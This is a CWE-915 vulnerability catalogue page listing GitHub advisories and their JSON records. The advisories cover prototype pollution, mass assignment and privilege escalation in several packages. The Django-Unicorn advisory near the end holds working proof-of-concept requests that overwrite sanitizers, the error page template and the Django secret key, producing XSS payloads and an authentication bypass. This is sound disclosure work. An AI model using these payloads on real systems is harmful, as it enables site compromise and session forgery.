Common Weakness Enumeration

CWE-915

Allowed

Improperly Controlled Modification of Dynamically-Determined Object Attributes

Abstraction: Base · Status: Incomplete

The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.

276 vulnerabilities reference this CWE, most recent first.

GHSA-FHV8-FX5F-7FXF

Vulnerability from github – Published: 2021-09-20 19:53 – Updated: 2024-12-06 18:20
VLAI
Summary
Prototype Pollution in the merge and clone helper methods
Details

Impact

Using merge and clone helper methods in the src/core/util.ts module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly.

Patches

It has been patched in https://github.com/ecomfe/zrender/pull/826. Users should update zrender to 5.2.1. and update echarts to 5.2.1 if project is using echarts.

References

NA

For more information

NA

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "zrender"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.3.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "zrender"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-39227"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-17T17:51:46Z",
    "nvd_published_at": "2021-09-17T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nUsing `merge` and `clone` helper methods in the `src/core/util.ts` module will have prototype pollution. It will affect the popular data visualization library Apache ECharts, which is using and exported these two methods directly.\n\n### Patches\n \nIt has been patched in https://github.com/ecomfe/zrender/pull/826. \nUsers should update zrender to `5.2.1`.  and update echarts to `5.2.1` if project is using echarts.\n\n### References\nNA\n\n### For more information\nNA\n",
  "id": "GHSA-fhv8-fx5f-7fxf",
  "modified": "2024-12-06T18:20:49Z",
  "published": "2021-09-20T19:53:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/security/advisories/GHSA-fhv8-fx5f-7fxf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39227"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/pull/826"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ecomfe/zrender"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ecomfe/zrender/releases/tag/5.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in the merge and clone helper methods"
}

GHSA-FPFF-PJFW-GFG7

Vulnerability from github – Published: 2026-04-07 00:30 – Updated: 2026-04-07 00:30
VLAI
Details

Unsanitized control of user-modifiable attributes in the session creation component in AWS Research and Engineering Studio (RES) prior to version 2026.03 could allow an authenticated remote user to escalate privileges, assume the virtual desktop host instance profile permissions, and interact with AWS resources and services via a crafted API request.

To remediate this issue, users are advised to upgrade to RES version 2026.03 or apply the corresponding mitigation patch to their existing environment.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5708"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-06T22:16:25Z",
    "severity": "HIGH"
  },
  "details": "Unsanitized control of user-modifiable attributes in the session creation component in AWS Research and Engineering Studio (RES) prior to version 2026.03 could allow an authenticated remote user to escalate privileges, assume the virtual desktop host instance profile permissions, and interact with AWS resources and services via a crafted API request.\n\nTo remediate this issue, users are advised to upgrade to RES version 2026.03 or apply the corresponding mitigation patch to their existing environment.",
  "id": "GHSA-fpff-pjfw-gfg7",
  "modified": "2026-04-07T00:30:22Z",
  "published": "2026-04-07T00:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5708"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/res/issues/149"
    },
    {
      "type": "WEB",
      "url": "https://aws.amazon.com/security/security-bulletins/2026-014-aws"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aws/res/releases/tag/2026.03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FXGC-2FPP-HX5W

Vulnerability from github – Published: 2026-04-20 18:31 – Updated: 2026-04-20 18:31
VLAI
Details

Vvveb prior to 1.0.8.1 contains a privilege escalation vulnerability in the admin user profile save endpoint that allows authenticated users to modify privileged fields on their own profile. Attackers can inject role_id=1 into profile save requests to escalate to Super Administrator privileges, enabling plugin upload functionality for remote code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-34427"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-20T16:16:44Z",
    "severity": "HIGH"
  },
  "details": "Vvveb prior to\u00a01.0.8.1 contains a privilege escalation vulnerability in the admin user profile save endpoint that allows authenticated users to modify privileged fields on their own profile. Attackers can inject role_id=1 into profile save requests to escalate to Super Administrator privileges, enabling plugin upload functionality for remote code execution.",
  "id": "GHSA-fxgc-2fpp-hx5w",
  "modified": "2026-04-20T18:31:48Z",
  "published": "2026-04-20T18:31:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34427"
    },
    {
      "type": "WEB",
      "url": "https://github.com/givanz/Vvveb/commit/0eca14af50f038915b8bf7ceec2becf6b6720b0a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.1"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/vvveb-privilege-escalation-via-admin-user-save"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FXWF-45C7-4PPR

Vulnerability from github – Published: 2021-10-12 16:40 – Updated: 2022-01-07 16:07
VLAI
Summary
Prototype pollution in object-hierarchy-access
Details

Overview:Prototype pollution vulnerability in ‘object-hierarchy-access’ versions 0.2.0 through 0.32.0 allows attacker to cause a denial of service and may lead to remote code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "object-hierarchy-access"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.0"
            },
            {
              "fixed": "0.33.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28270"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-11T21:14:17Z",
    "nvd_published_at": "2020-11-12T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Overview:Prototype pollution vulnerability in \u2018object-hierarchy-access\u2019 versions 0.2.0 through 0.32.0 allows attacker to cause a denial of service and may lead to remote code execution.",
  "id": "GHSA-fxwf-45c7-4ppr",
  "modified": "2022-01-07T16:07:29Z",
  "published": "2021-10-12T16:40:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28270"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mjpclab/object-hierarchy-access/commit/7b1aa134a8bc4a376296bcfac5c3463aef2b7572"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mjpclab/object-hierarchy-access"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28270"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28270,"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in object-hierarchy-access"
}

GHSA-G452-6RFC-VRVX

Vulnerability from github – Published: 2021-09-01 18:31 – Updated: 2021-08-30 21:26
VLAI
Summary
Prototype Pollution in open-graph
Details

This affects the package open-graph before 0.2.6. The function parse could be tricked into adding or modifying properties of Object.prototype using a proto or constructor payload.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "open-graph"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-23419"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-30T21:26:31Z",
    "nvd_published_at": "2021-08-08T08:15:00Z",
    "severity": "MODERATE"
  },
  "details": "This affects the package open-graph before 0.2.6. The function parse could be tricked into adding or modifying properties of Object.prototype using a __proto__ or constructor payload.",
  "id": "GHSA-g452-6rfc-vrvx",
  "modified": "2021-08-30T21:26:46Z",
  "published": "2021-09-01T18:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23419"
    },
    {
      "type": "WEB",
      "url": "https://github.com/samholmes/node-open-graph/commit/a0cef507a90adaac7dbbe9c404f09a50bdefb348"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/samholmes/node-open-graph"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-OPENGRAPH-1536747"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype Pollution in open-graph"
}

GHSA-G4GQ-J4P2-J8FR

Vulnerability from github – Published: 2021-08-05 17:00 – Updated: 2024-09-03 21:14
VLAI
Summary
Remote Code Execution via Script (Python) objects under Python 3
Details

Impact

Background: The optional add-on package Products.PythonScripts adds Script (Python) to the list of content items a user can add to the Zope object database. Inside these scripts users can write Python code that is executed when rendered through the web. The code environment in these script objects is limited, it relies on the RestrictedPython package to provide a "safe" subset of Python instructions as well as the AccessControl package that defines security policies for execution in the context of a Zope application.

Recently the AccessControl package was updated to fix a remote code execution security issue. A link to the security advisory is provided in the References section below. The bug tightens the AccessControl security policies for Zope by blocking access to unsafe classes inside the Python string module.

You are only affected if the following are true:

  • You use Python 3 for your Zope deployment (Zope 4 on Python 2 is not affected)
  • You run Zope 4 below version 4.6.3 or Zope 5 below version 5.3
  • You have installed the optional Products.PythonScripts add-on package

By default, you need to have the admin-level Zope "Manager" role to add or edit Script (Python) objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk.

Patches

The problem has been fixed in AccessControl versions 4.3 and 5.2. Zope releases 4.6.3 and 5.3 now require these new AccessControl releases.

Workarounds

A site administrator can restrict adding/editing Script (Python) objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.

References

For more information

If you have any questions or comments about this advisory: * Open an issue in the Zope issue tracker * Email us at security@plone.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Zope"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0"
            },
            {
              "fixed": "4.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Zope"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0"
            },
            {
              "fixed": "5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-32811"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-02T22:57:25Z",
    "nvd_published_at": "2021-08-02T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nBackground: The optional add-on package `Products.PythonScripts` adds `Script (Python)` to the list of content items a user can add to the Zope object database. Inside these scripts users can write Python code that is executed when rendered through the web. The code environment in these script objects is limited, it relies on the `RestrictedPython` package to provide a \"safe\" subset of Python instructions as well as the `AccessControl` package that defines security policies for execution in the context of a Zope application.\n\nRecently the `AccessControl` package was updated to fix a remote code execution security issue. A link to the security advisory is provided in the References section below. The bug tightens the `AccessControl` security policies for Zope by blocking access to unsafe classes inside the Python `string` module.\n\nYou are only affected if the following are true:\n\n- You use Python 3 for your Zope deployment (Zope 4 on Python 2 is not affected)\n- You run Zope 4 below version 4.6.3 or Zope 5 below version 5.3\n- You have installed the optional `Products.PythonScripts` add-on package\n\nBy default, you need to have the admin-level Zope \"Manager\" role to add or edit Script (Python) objects through the web. Only sites that allow untrusted users to add/edit these scripts through the web - which would be a very unusual configuration to begin with - are at risk.\n\n### Patches\nThe problem has been fixed in `AccessControl` versions 4.3 and 5.2. Zope releases 4.6.3 and 5.3 now require these new `AccessControl` releases.\n\n### Workarounds\nA site administrator can restrict adding/editing Script (Python) objects through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing these scripts through the web should be restricted to trusted users only. This is the default configuration in Zope.\n\n### References\n* [AccessControl security advisory GHSA-qcx9-j53g-ccgf](https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues)\n* Email us at [security@plone.org](mailto:security@plone.org)\n\n",
  "id": "GHSA-g4gq-j4p2-j8fr",
  "modified": "2024-09-03T21:14:03Z",
  "published": "2021-08-05T17:00:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/AccessControl/security/advisories/GHSA-qcx9-j53g-ccgf"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/security/advisories/GHSA-g4gq-j4p2-j8fr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32811"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/commit/869f947e586517566509e0ccdd4d99b60704cc02"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/Zope/commit/f72a18dda8e9bf2aedb46168761668464a4be988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/zope/PYSEC-2021-368.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zopefoundation/Zope"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Remote Code Execution via Script (Python) objects under Python 3"
}

GHSA-G5GC-H5HP-555F

Vulnerability from github – Published: 2026-01-13 20:37 – Updated: 2026-01-13 21:41
VLAI
Summary
Mass Assignment in AdonisJS Lucid Allows Overwriting Internal ORM State
Details

Summary

Description A Mass Assignment (CWE-915) vulnerability in AdonisJS Lucid may allow a remote attacker who can influence data that is passed into Lucid model assignments to overwrite the internal ORM state. This may lead to logic bypasses and unauthorized record modification within a table or model. This affects @adonisjs/lucid through version 21.8.1 and 22.x pre-release versions prior to 22.0.0-next.6. This has been patched in @adonisjs/lucid versions 21.8.2 and 22.0.0-next.6.

Details

A vulnerability in the BaseModelImpl class of @adonisjs/lucid may allow an attacker to overwrite internal class properties (such as $isPersisted, $attributes, or $isDeleted) when passing plain objects to model assignment methods.

The library relies on a this.hasOwnProperty(key) check to validate assignment targets. However, because internal ORM state properties are initialized as instance properties, they pass this check. Consequently, if an attacker can influence specific keys (like $isPersisted) into the payload passed to merge() or $consumeAdapterResult(), they can hijack the ORM's internal logic.

The exposed internal properties include: - $attributes: The raw storage for model data. - $isPersisted: Controls whether save() performs an INSERT or an UPDATE. - $original: Stores the original state of the record used to calculate changes. - $isDeleted: Prevents operations on deleted models.

This issue propagates to the entire write surface of the library, including: - Instance methods fill and merge. - Single record creation methods create, createQuietly, firstOrNew, and firstOrCreate. - Conditional updates via updateOrCreate. - Bulk operations createMany, createManyQuietly, fetchOrNewUpMany, fetchOrCreateMany, and updateOrCreateMany.

Impact

Applications are vulnerable if they pass unvalidated data or validated data that retains unknown properties to the model. This occurs because internal keys exist as instance properties, causing them to pass the hasOwnProperty check and bypass Lucid's default rejection of unknown properties.

Applications utilizing strict allow lists for input validation that discard unknown properties are not affected.

For example, if a developer passes request.all(), request.except() or a schema with allowUnknownProperties to Model.create(), the ORM's internal logic can be hijacked. Because the Model.create() > save() decision is based on $isPersisted, and merge() can assign to the own-property $isPersisted, an attacker who can inject "$isPersisted": true into the payload can force save() to take the UPDATE branch rather than the INSERT branch, while setting $attributes can bypass validators or field restrictions.

Patches

This issue has been patched in @adonisjs/lucid version 21.8.2 and 22.0.0-next.6. Please upgrade to this version or later.

Developers can mitigate this issue by strictly validating model inputs with an allow list that drops unknown keys if possible.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 21.8.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/lucid"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "21.8.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@adonisjs/lucid"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "22.0.0-next.0"
            },
            {
              "fixed": "22.0.0-next.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22814"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-915"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-13T20:37:09Z",
    "nvd_published_at": "2026-01-13T20:16:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n**Description**\nA Mass Assignment (CWE-915) vulnerability in AdonisJS Lucid may allow a remote attacker who can influence data that is passed into Lucid model assignments to overwrite the internal ORM state. This may lead to logic bypasses and unauthorized record modification within a table or model. This affects @adonisjs/lucid through version 21.8.1 and 22.x pre-release versions prior to 22.0.0-next.6. This has been patched in @adonisjs/lucid versions 21.8.2 and 22.0.0-next.6.\n\n### Details\nA vulnerability in the `BaseModelImpl` class of `@adonisjs/lucid` may allow an attacker to overwrite internal class properties (such as `$isPersisted`, `$attributes`, or `$isDeleted`) when passing plain objects to model assignment methods.\n\nThe library relies on a `this.hasOwnProperty(key)` check to validate assignment targets. However, because internal ORM state properties are initialized as instance properties, they pass this check. Consequently, if an attacker can influence specific keys (like `$isPersisted`) into the payload passed to `merge()` or `$consumeAdapterResult()`, they can hijack the ORM\u0027s internal logic.\n\nThe exposed internal properties include:\n- `$attributes`: The raw storage for model data.\n- `$isPersisted`: Controls whether\u00a0`save()`\u00a0performs an\u00a0`INSERT`\u00a0or an\u00a0`UPDATE`.\n- `$original`: Stores the original state of the record used to calculate\u00a0changes.\n- `$isDeleted`: Prevents operations on deleted models.\n\nThis issue propagates to the entire write surface of the library, including:\n- Instance methods `fill` and  `merge`.\n- Single record creation methods `create`, `createQuietly`, `firstOrNew`, and `firstOrCreate`.\n- Conditional updates via `updateOrCreate`.\n- Bulk operations `createMany`, `createManyQuietly`, `fetchOrNewUpMany`, `fetchOrCreateMany`, and `updateOrCreateMany`.\n\n### Impact\nApplications are vulnerable if they pass unvalidated data or validated data that retains unknown properties to the model. This occurs because internal keys exist as instance properties, causing them to pass the `hasOwnProperty` check and bypass Lucid\u0027s default rejection of unknown properties.\n\nApplications utilizing strict allow lists for input validation that discard unknown properties are not affected.\n\nFor example, if a developer passes\u00a0`request.all()`, `request.except()` or a schema with `allowUnknownProperties` to\u00a0`Model.create()`, the ORM\u0027s internal logic can be hijacked. Because the\u00a0`Model.create()` \u003e `save()`\u00a0decision is based on\u00a0`$isPersisted`, and\u00a0`merge()`\u00a0can assign to the own-property\u00a0`$isPersisted`, an attacker who can inject\u00a0`\"$isPersisted\": true`\u00a0into the payload can force\u00a0`save()`\u00a0to take the UPDATE branch rather than the INSERT branch, while setting `$attributes` can bypass validators or field restrictions.\n\n\n### Patches\nThis issue has been patched in @adonisjs/lucid version `21.8.2` and `22.0.0-next.6`. Please upgrade to this version or later.\n\nDevelopers can mitigate this issue by strictly validating model inputs with an allow list that drops unknown keys if possible.",
  "id": "GHSA-g5gc-h5hp-555f",
  "modified": "2026-01-13T21:41:38Z",
  "published": "2026-01-13T20:37:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/adonisjs/lucid/security/advisories/GHSA-g5gc-h5hp-555f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22814"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/adonisjs/lucid"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Mass Assignment in AdonisJS Lucid Allows Overwriting Internal ORM State"
}

GHSA-G9WF-5777-GQ43

Vulnerability from github – Published: 2025-02-03 15:48 – Updated: 2025-05-08 14:33
VLAI
Summary
Django-Unicorn Class Pollution Vulnerability, Leading to XSS, DoS and Authentication Bypass
Details

Summary

Django-Unicorn is vulnerable to python class pollution vulnerability, a new type of vulnerability categorized under CWE-915. The vulnerability arises from the core functionality set_property_value, which can be remotely triggered by users by crafting appropriate component requests and feeding in values of second and third parameter to the vulnerable function, leading to arbitrary changes to the python runtime status.

At least five ways of vulnerability exploitation have been found, stably resulting in Cross-Site Scripting (XSS), Denial of Service (DoS), and Authentication Bypass attacks in almost every Django-Unicorn-based application.

Analysis of Vulnerable Function

By taking a look at the vulnerable function set_property_value located at: django_unicorn/views/action_parsers/utils.py. You can observe the functionality is responsible for modifying a property value of an object.

The property is specified by a dotted form of path at the second parameter property_name, where nested reference to object is supported, and base object and the assigned value is given by the first parameter component and third parameter property_value.

# https://github.com/adamghill/django-unicorn/blob/7dcb01009c3c4653b24e0fb06c7bc0f9d521cbb0/django_unicorn/views/action_parsers/utils.py#L10
def set_property_value(
    component,
    property_name,
    property_value
) -> None:
    ...
    property_name_parts = property_name.split(".")
    component_or_field = component
    ...
    for idx, property_name_part in enumerate(property_name_parts):
        if hasattr(component_or_field, property_name_part):
            if idx == len(property_name_parts) - 1:
                ...
                setattr(component_or_field, property_name_part, property_value)
                ...
            else:
                component_or_field = getattr(component_or_field, property_name_part)
                ...
        elif isinstance(component_or_field, dict):
            if idx == len(property_name_parts) - 1:
                component_or_field[property_name_part] = property_value
                ...
            else:
                component_or_field = component_or_field[property_name_part]
                ...
        elif isinstance(component_or_field, (QuerySet, list)):
            property_name_part_int = int(property_name_part)

            if idx == len(property_name_parts) - 1:
                component_or_field[property_name_part_int] = property_value  # type: ignore[index]
                ...
            else:
                component_or_field = component_or_field[property_name_part_int]  # type: ignore[index]
                ...
        else:
            break

Meanwhile, this functionality can be directly triggered by a component request, one of the core functionalities of the project, by specifying the request type as syncInput and payload object would be fed in the dotted-path (2nd) parameter and assigned value (3rd) parameter of the vulnerable function.

POST /unicorn/message/COMPONENT_NAME

{
    "id": 123,
    "actionQueue":[
        {
          "type": "syncInput",
          "payload": {
          "name": "DOTTED_PATH",
          "value":"ASSIGNED_VALUE"
          }
            }
    ],
    "data": {XXX},
    "epoch": "123",
    "checksum": "XXXX"
}

You are now aware of that users from the remote can fully control the property_name and property_value of the vulnerable function. By default the preperty value overwrite can only be performed on the component object, which is always the first parameter of the function.

However, the functionality failed to count in the situation where bad actors can modify the normal path to traverse to other objects in the python runtime, by leveraging the magic attributes. For example, if the property_name was set to __init__.__globals__, the component context would change to global context of the component module, which means you can modify any attributes of the objects that are located in the global scope of the component module. These objects also include other modules that have been imported in the component module, which comprises of a pollutable dependency chain.

With all these techniques introduced, you can now change any global objects including, global variables/instances/classes/functions of any module that is in a chain of dependency from the component module.

The next section introduces the five exploitation gadgets found so far, leading to reflected XSS, stored XSS, authentication bypass and DOS attack. It uses a locally deployed django-unicorn.com as demo website to showcase its large-scale impact.

Here, gadgets refer to the dependency code snippets by default introduced by django-unicorn and changing its status can result in an attack sequence, such as XSS.

Proof of Concept

#1 Reflected Cross-Site Scripting by Overwriting bs4 HTML sanitizer

Django-Unicorn implants the EntitySubstitution rule from beautifulsoup4 library into its HTML formatter, formatting all the template response messages.

image-20250121163510422

While this rule is specified in a global dictionary, you can exploit the class pollution vulnerability to overwrite it.

POST /unicorn/message/todo HTTP/1.1

{
  "id": 123,
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.bs4.dammit.EntitySubstitution.CHARACTER_TO_XML_ENTITY.<",
        "value": "<img/src=1 onerror=alert('bs4_html_entity_bypass')>"
      }
    }
  ],
  "data": {
    "task": "",
    "tasks": []
  },
  "epoch": "123",
  "checksum": "XXX"
}

In this demonstration, replaced the sanitizer's < item value with the XSS payload. whenever a template reponse renders a "<" in cleartext, it will be converted to the payload, leading to XSS attack.

bs4-xss

#2 Stored Cross-Site Scripting by Overwriting Unicorn Setting and Django Json Script Sanitizer

There is always a script tag in the webpage. Among it, a NAME value is dynamically extracted both from the MORPHER_NAMES and DEFAULT_MORPHER_NAME variable in the setting module.

image-20250121165007647

However, simply polluting these values can not lead to a stored XSS attack. Django by default escape some of the special characters into unicode sequences.

image-20250121164947336

Going through the source code of django, you will find the actual sanitizer located at _json_script_escapes variable at django/utils/html.py.

image-20250121165247245

By polluting this variable to clear it out, you finally achieve a stored XSS attack.

image-20250121165839892

PoC:

POST /unicorn/message/todo HTTP/1.1

{
  "id": "3gpDSUcxzs1",
  "data": {
    "task": "",
    "tasks": []
  },
  "checksum": "XXX",
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.django_unicorn.settings.MORPHER_NAMES",
        "value": [
          "</script><script>alert('django json unicode escape bypass + configuration overwrite')</script>"
        ]
      }
    },
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.django_unicorn.settings.DEFAULT_MORPHER_NAME",
        "value": "</script><script>alert('django json unicode escape bypass + configuration overwrite')</script>"
      }
    },
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.django.utils.html._json_script_escapes",
        "value": {}
      }
    }
  ],
  "epoch": 1737318956605,
  "hash": "jWGuTFzy"
}

json_unicode_xss

#3 Stored Cross-Site Scripting by Overwriting Django Error Page Source Code

Django by default stores its error page source code in a global variable named ERROR_PAGE_TEMPLATE at django/views/defaults.py.

image-20250121170357900

By polluting this variable to XSS payload. whenever a user triggers an error in the application, such as access an unexisting resource, the attack payload fires out.

POST /unicorn/message/todo HTTP/1.1

{
  "id": 123,
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.django.views.defaults.ERROR_PAGE_TEMPLATE",
        "value": "<html><script>alert('error page pollution')</script></html>"
      }
    }
  ],
  "data": {
    "task": "",
    "tasks": []
  },
  "epoch": "123",
  "checksum": "XXX"
}

django-404-xss

#4 Authentication Bypass by Overwriting Django Secret Key

Django secret key is typically used to sign and verify session cookies and other security related mechanism. By polluting its runtime value to attacker intended, attacker can forge session cookies to login in to the system as any user.

Even though, django-unicorn.com doesn't have an authentication layer, you can still observe a successful secret key pollution by inspecting the changed checksum in the HTTP response, since the checksum is generated by encrypting the data field in the request body with the secret key.

POST /unicorn/message/todo HTTP/1.1

{
  "id": 123,
  "actionQueue": [
    {
      "type": "syncInput",
      "payload": {
        "name": "__init__.__globals__.sys.modules.django.template.backends.django.settings.SECRET_KEY",
        "value": "test"
      }
    }
  ],
  "data": {
    "task": "",
    "tasks": []
  },
  "epoch": "123",
  "checksum": "XXX"
}

authentication_bypass

#5 Denial of Service by Overwriting timed Decorator Method

